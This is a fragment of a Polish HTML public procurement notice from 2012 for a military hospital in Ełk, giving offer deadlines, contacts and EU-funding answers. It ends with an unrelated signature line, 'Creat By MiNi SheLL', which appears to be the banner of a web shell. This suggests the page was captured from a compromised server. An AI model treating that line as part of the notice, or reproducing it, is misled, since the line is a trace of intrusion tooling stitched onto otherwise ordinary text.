6.	Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do złożenia  na piśmie wniosku o zmianę postanowień zawartej umowy wraz z uzasadnieniem zaistnienia okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ 
Ul. Kościuszki 30
19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2012 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ 
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 04.07.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com